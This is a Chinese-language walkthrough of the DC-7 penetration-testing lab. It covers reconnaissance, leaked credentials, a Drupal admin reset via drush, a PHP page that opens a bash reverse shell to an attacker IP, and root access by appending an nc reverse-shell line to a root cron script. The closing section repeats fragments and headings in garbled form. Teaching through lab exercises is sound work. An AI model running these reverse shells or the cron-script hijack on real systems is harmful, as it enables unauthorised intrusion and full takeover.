DC-7靶机渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 网络扫描<\/h3>

使用nmap扫描靶机IP地址和开放端口：<\/p>

nmap 192.168.130.147
<\/span><\/span><\/code><\/pre>发现开放端口：<\/p>

80: HTTP服务<\/li>
22: SSH服务<\/li>
<\/ul>
1.2 Web目录扫描<\/h3>
使用dirsearch扫描Web目录结构，只显示200和403状态码的目录：<\/p>
dirsearch -u 192.168.130.147 -i 200,403
<\/span><\/span><\/code><\/pre>扫描到重要目录：\/user\/login\/<\/code><\/p>
2. Web应用分析<\/h2>
2.1 CMS识别<\/h3>
在登录页面左下角发现CMS标识：Drupal<\/strong><\/p>
2.2 登录页面提示<\/h3>
主页有提示："暴力破解是不行的"，表明不能使用暴力破解方法<\/p>
2.3 关键信息发现<\/h3>
在登录页面左下角发现信息：@DC7USER<\/code><\/p>
3. 初始访问获取<\/h2>
3.1 GitHub信息查找<\/h3>
通过浏览器查找@DC7USER<\/code>，发现来自GitHub项目，从中获取到：<\/p>

用户名：dc7user<\/li>
密码：MdR3xOgB7#dW<\/li>
<\/ul>
3.2 SSH登录<\/h3>
使用获取的凭据通过SSH登录：<\/p>
ssh dc7user@192.168.130.147
<\/span><\/span><\/code><\/pre>4. 权限提升路径分析<\/h2>
4.1 SUID提权尝试<\/h3>
查找具有SUID权限的文件：<\/p>
find \/ -perm -u=<\/span>s -type f 2>\/dev\/null
<\/span><\/span><\/code><\/pre>未发现可利用的命令<\/p>
4.2 Sudo权限检查<\/h3>
检查sudo可用命令：<\/p>
sudo -l
<\/span><\/span><\/code><\/pre>无可用sudo权限，但发现邮件提示信息<\/p>
4.3 定时任务分析<\/h3>
查看用户邮件，发现定时任务信息：<\/p>
cat \/var\/mail\/dc7user
<\/span><\/span><\/code><\/pre>输出内容：<\/p>
Subject: Cron <root@dc-7> \/opt\/scripts\/backups.sh
From: root@dc-7 (Cron Daemon)
<\/code><\/pre>
表明root用户定期执行\/opt\/scripts\/backups.sh<\/code>脚本<\/p>
4.4 脚本权限检查<\/h3>
检查备份脚本的权限：<\/p>
ls -l \/opt\/scripts\/backups.sh
<\/span><\/span><\/code><\/pre>发现需要root用户或www-data组权限才能修改<\/p>
5. Web权限获取<\/h2>
5.1 确认www-data用户<\/h3>
确认www-data是Web服务用户：<\/p>
ps -fu www-data
<\/span><\/span><\/code><\/pre>5.2 分析备份脚本<\/h3>
查看备份脚本内容：<\/p>
cat \/opt\/scripts\/backups.sh
<\/span><\/span><\/code><\/pre>发现使用drush<\/code>命令<\/p>
5.3 Drush工具利用<\/h3>
Drush是Drupal的官方命令行工具，可用于管理Drupal网站<\/p>
5.3.1 创建管理员用户<\/h4>
切换到Drupal根目录并创建新用户：<\/p>
cd \/var\/www\/html
<\/span><\/span>drush user-password admin --password=<\/span>admin
<\/span><\/span><\/code><\/pre>5.3.2 登录Web后台<\/h4>
使用新创建的用户(admin\/admin)登录Drupal后台<\/p>
6. 获取WebShell<\/h2>
6.1 安装PHP模块<\/h3>
下载并安装PHP模块：<\/p>
https:\/\/ftp.drupal.org\/files\/projects\/php-8.x-1.0.tar.gz
<\/code><\/pre>
安装后启用PHP扩展<\/p>
6.2 创建反弹Shell<\/h3>

在Kali上设置监听：<\/li>
<\/ol>
nc -lvp 8888<\/span>
<\/span><\/span><\/code><\/pre>
在Drupal后台创建包含以下PHP代码的页面：<\/li>
<\/ol>
<?<\/span>php<\/span>
<\/span><\/span>exec<\/span>("\/bin\/bash -c 'bash -i >& \/dev\/tcp\/192.168.130.128\/8888 0>&1'"<\/span>);
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>6.3 获取www-data Shell<\/h3>
访问创建的PHP页面，获取www-data用户的WebShell<\/p>
7. 最终权限提升<\/h2>
7.1 确认组权限<\/h3>
检查当前用户的组权限：<\/p>
groups
<\/span><\/span><\/code><\/pre>确认有www-data组权限<\/p>
7.2 修改备份脚本<\/h3>
向备份脚本添加反弹Shell命令：<\/p>
echo 'nc -e \/bin\/bash 192.168.130.128 7777'<\/span> >> \/opt\/scripts\/backups.sh
<\/span><\/span><\/code><\/pre>在Kali上设置新的监听端口(7777)<\/p>
7.3 获取root Shell<\/h3>
等待定时任务执行，获取root权限的Shell<\/p>
8. 获取flag<\/h2>
8.1 查找flag文件<\/h3>
find \/ -name *flag*
<\/span><\/span><\/code><\/pre>8.2 读取最终flag<\/h3>
cat \/root\/theflag.txt
<\/span><\/span><\/code><\/pre>关键点总结<\/h2>

信息收集要全面：nmap扫描、目录扫描、CMS识别<\/li>
注意页面上的提示信息：如GitHub用户名提示<\/li>
定时任务是常见提权路径<\/li>
Drush工具是Drupal管理的关键<\/li>
Web后台管理权限可以转换为系统权限<\/li>
修改root执行的脚本是有效的提权方法<\/li>
多阶段反弹Shell是绕过限制的有效手段<\/li>
<\/ol>

DC-7靶机渗透测试教学文档<\/h1>

1. 信息收集阶段<\/h2>

2.1 CMS识别<\/h3> 在登录页面左下角发现CMS标识：Drupal<\/strong><\/p>

2.3 关键信息发现<\/h3> 在登录页面左下角发现信息：@DC7USER<\/code><\/p>

4. 权限提升路径分析<\/h2>

5. Web权限获取<\/h2>

5.3.2 登录Web后台<\/h4> 使用新创建的用户(admin\/admin)登录Drupal后台<\/p>

6. 获取WebShell<\/h2>

6.3 获取www-data Shell<\/h3> 访问创建的PHP页面，获取www-data用户的WebShell<\/p>

7. 最终权限提升<\/h2>

7.3 获取root Shell<\/h3> 等待定时任务执行，获取root权限的Shell<\/p>

8. 获取flag<\/h2>

2.1 CMS识别<\/h3>
在登录页面左下角发现CMS标识：Drupal<\/strong><\/p>

2.3 关键信息发现<\/h3>
在登录页面左下角发现信息：`@DC7USER<\/code><\/p>`

5.3.2 登录Web后台<\/h4>
使用新创建的用户(admin\/admin)登录Drupal后台<\/p>

6.3 获取www-data Shell<\/h3>
访问创建的PHP页面，获取www-data用户的WebShell<\/p>

7.3 获取root Shell<\/h3>
等待定时任务执行，获取root权限的Shell<\/p>